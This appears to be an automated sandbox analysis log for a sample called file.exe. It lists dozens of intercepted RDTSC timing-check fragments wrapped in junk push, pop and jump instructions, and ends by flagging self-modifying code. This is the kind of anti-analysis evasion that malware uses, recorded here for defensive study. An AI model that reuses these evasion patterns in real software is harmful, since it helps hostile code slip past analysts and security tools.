Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77E624 second address: 77E63C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F76A540C8E0h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8067A9 second address: 8067B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F76A4C93C16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 809EFD second address: 809F19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A540C8DBh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F76A540C8D6h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 80A029 second address: 80A02F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 80E6C2 second address: 80E6C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 80E6C8 second address: 80E6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 80E7F6 second address: 80E7FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 80E7FA second address: 80E811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F76A4C93C16h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 80EA72 second address: 80EA87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76A540C8E1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BAE33 second address: 7BAE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F76A4C93C16h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BAE45 second address: 7BAEB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A540C8E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F76A540C8D8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+1247BE86h] 0x0000002b adc di, 7FAEh 0x00000030 add eax, ebx 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F76A540C8D8h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 jnp 00007F76A540C8D6h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BAEB7 second address: 7BAEBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BAEBB second address: 7BAEC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 80EEC3 second address: 80EEC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 812D2E second address: 812D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 jns 00007F76A540C8DCh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 812D41 second address: 812D46 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 812EAC second address: 812ED7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F76A540C8E1h 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F76A540C8D8h 0x00000013 jmp 00007F76A540C8DAh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 812ED7 second address: 812EDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 812EDD second address: 812EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 812EE1 second address: 812EE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8131BE second address: 8131D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F76A540C8D6h 0x0000000a jmp 00007F76A540C8DCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 813444 second address: 813448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 813448 second address: 81344C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81A8CB second address: 81A8D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81ABF9 second address: 81ABFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81AECD second address: 81AEF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76A4C93C27h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F76A4C93C16h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81AEF3 second address: 81AEF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B4C0 second address: 81B4C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B791 second address: 81B79B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81BE0F second address: 81BE31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F76A4C93C28h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C11F second address: 81C123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C408 second address: 81C422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76A4C93C22h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C422 second address: 81C427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C427 second address: 81C42D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C42D second address: 81C431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F5B8 second address: 81F5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F76A4C93C22h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F5D3 second address: 81F5D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81FDA1 second address: 81FDA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81FDA9 second address: 81FDC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F76A540C8E8h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81FDC8 second address: 81FDDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A4C93C1Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 820095 second address: 8200AE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F76A540C8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F76A540C8DCh 0x00000013 jnp 00007F76A540C8D6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 824A57 second address: 824A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 824A5F second address: 824A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F76A540C8E2h 0x0000000b jno 00007F76A540C8D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82AC3E second address: 82AC42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82AC42 second address: 82AC4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82AC4C second address: 82AC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82AC50 second address: 82AC5A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F76A540C8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82AC5A second address: 82AC61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82B329 second address: 82B32F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82B32F second address: 82B333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82B333 second address: 82B349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F76A540C8E2h 0x0000000e jne 00007F76A540C8D6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833663 second address: 833669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833669 second address: 8336A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jp 00007F76A540C8D6h 0x0000000c jmp 00007F76A540C8E6h 0x00000011 pop ecx 0x00000012 jmp 00007F76A540C8E3h 0x00000017 popad 0x00000018 push edi 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8336A4 second address: 8336AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8406D3 second address: 8406EF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F76A540C8DCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F76A540C8DAh 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8406EF second address: 8406F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844EB7 second address: 844EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F76A540C8D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 853849 second address: 85384F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85384F second address: 85385B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jo 00007F76A540C8D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85385B second address: 853874 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b jns 00007F76A4C93C16h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 853874 second address: 85387A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C0A1 second address: 85C0F5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d jmp 00007F76A4C93C26h 0x00000012 jmp 00007F76A4C93C29h 0x00000017 jmp 00007F76A4C93C1Dh 0x0000001c popad 0x0000001d popad 0x0000001e push ebx 0x0000001f jng 00007F76A4C93C1Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85A9E2 second address: 85A9E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85A9E8 second address: 85A9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85A9EC second address: 85AA0E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F76A540C8D6h 0x00000008 jmp 00007F76A540C8E5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85AB72 second address: 85AB97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A4C93C21h 0x00000007 jmp 00007F76A4C93C1Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85AE35 second address: 85AE43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85AE43 second address: 85AE47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85AF83 second address: 85AF87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B116 second address: 85B12D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F76A4C93C1Bh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B12D second address: 85B13D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F76A540C8D6h 0x00000008 jno 00007F76A540C8D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B2D0 second address: 85B2D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B2D5 second address: 85B2E0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jl 00007F76A540C8D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B2E0 second address: 85B306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F76A4C93C1Ch 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jnp 00007F76A4C93C1Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BD9B second address: 85BD9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BD9F second address: 85BDBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F76A4C93C28h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FCA1 second address: 85FCA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FCA5 second address: 85FCC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A4C93C1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F76A4C93C22h 0x0000000f jl 00007F76A4C93C16h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85F861 second address: 85F86A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85F86A second address: 85F86E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85F86E second address: 85F884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76A540C8DDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E3F4 second address: 86E40F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F76A4C93C26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E783 second address: 87E787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E787 second address: 87E78D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88EACC second address: 88EAD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88EAD0 second address: 88EAD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88ED6B second address: 88ED7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnc 00007F76A540C8D6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88EEE7 second address: 88EEFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F76A4C93C1Ch 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88F6DF second address: 88F6E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F76A540C8D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88F6E9 second address: 88F6ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 895ABD second address: 895AD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007F76A540C8D6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 jo 00007F76A540C8D6h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 895AD5 second address: 895AF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A4C93C21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0236 second address: 4EF024C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A540C8DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF024C second address: 4EF0251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF02D7 second address: 4EF02F1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 26119F5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov bh, cl 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e mov dx, si 0x00000011 mov dh, al 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF02F1 second address: 4EF02F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, si 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF02F9 second address: 4EF032F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A540C8DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F76A540C8DCh 0x00000012 add ecx, 5F733D48h 0x00000018 jmp 00007F76A540C8DBh 0x0000001d popfd 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 611ACF instructions caused by: Self-modifying code
